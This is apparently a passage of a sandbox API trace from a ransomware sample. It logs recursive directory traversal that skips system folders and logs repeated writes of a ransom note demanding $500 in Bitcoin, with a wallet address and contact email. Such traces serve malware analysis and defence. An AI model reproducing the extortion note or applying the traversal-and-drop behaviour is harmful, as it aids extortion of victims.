FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="Windows") returned -1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="Program Files") returned -1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="Program Files (x86)") returned -1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="$Recycle.bin") returned 1 [0089.655] lstrcmpiW (lpString1="D5NTRC6R", lpString2="System Volume Information") returned -1 [0089.655] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R") returned 88 [0089.655] lstrcmpW (lpString1="D5NTRC6R", lpString2=".") returned 1 [0089.655] lstrcmpW (lpString1="D5NTRC6R", lpString2="..") returned 1 [0089.656] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*") returned 90 [0089.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.675] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.675] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\.") returned 90 [0089.675] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.675] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.675] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.675] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.675] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.675] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.675] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\..") returned 91 [0089.675] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.675] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.675] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.675] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.675] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\RESTORE_FILES.txt") returned 106 [0089.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.676] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.676] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.677] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.677] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.677] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.677] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.677] CloseHandle (hObject=0x150) returned 1 [0089.677] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.677] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.677] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\RESTORE_FILES.txt") returned 97 [0089.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.678] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.678] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.679] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.679] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.679] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.679] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.679] CloseHandle (hObject=0x14c) returned 1 [0089.685] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.685] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.685] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\RESTORE_FILES.txt") returned 86 [0089.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.691] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.691] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.692] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.692] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.692] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.692] CloseHandle (hObject=0xd8) returned 1 [0089.692] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="Windows") returned -1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="Program Files") returned -1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="Program Files (x86)") returned -1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="$Recycle.bin") returned 1 [0089.692] lstrcmpiW (lpString1="Headlights", lpString2="System Volume Information") returned -1 [0089.692] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights") returned 66 [0089.692] lstrcmpW (lpString1="Headlights", lpString2=".") returned 1 [0089.692] lstrcmpW (lpString1="Headlights", lpString2="..") returned 1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned 68 [0089.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.693] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.693] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.693] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.693] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.693] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\.") returned 68 [0089.693] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.693] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.693] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.693] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.693] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.693] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.693] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\..") returned 69 [0089.693] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.693] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.693] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.693] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.693] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\RESTORE_FILES.txt") returned 84 [0089.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.694] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.694] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.695] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.695] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.695] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.695] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.695] CloseHandle (hObject=0xd8) returned 1 [0089.695] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="Windows") returned -1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files") returned -1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files (x86)") returned -1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="$Recycle.bin") returned 1 [0089.695] lstrcmpiW (lpString1="Linguistics", lpString2="System Volume Information") returned -1 [0089.695] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics") returned 67 [0089.695] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0089.695] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0089.695] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned 69 [0089.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.695] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.695] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.695] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.695] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.695] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.695] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\.") returned 69 [0089.695] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.695] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.696] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\..") returned 70 [0089.696] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.696] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.696] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="Windows") returned -1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files") returned -1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files (x86)") returned -1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="$Recycle.bin") returned 1 [0089.696] lstrcmpiW (lpString1="Dictionaries", lpString2="System Volume Information") returned -1 [0089.696] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries") returned 80 [0089.696] lstrcmpW (lpString1="Dictionaries", lpString2=".") returned 1 [0089.696] lstrcmpW (lpString1="Dictionaries", lpString2="..") returned 1 [0089.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned 82 [0089.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.696] lstrcmpiW (lpString1=".", 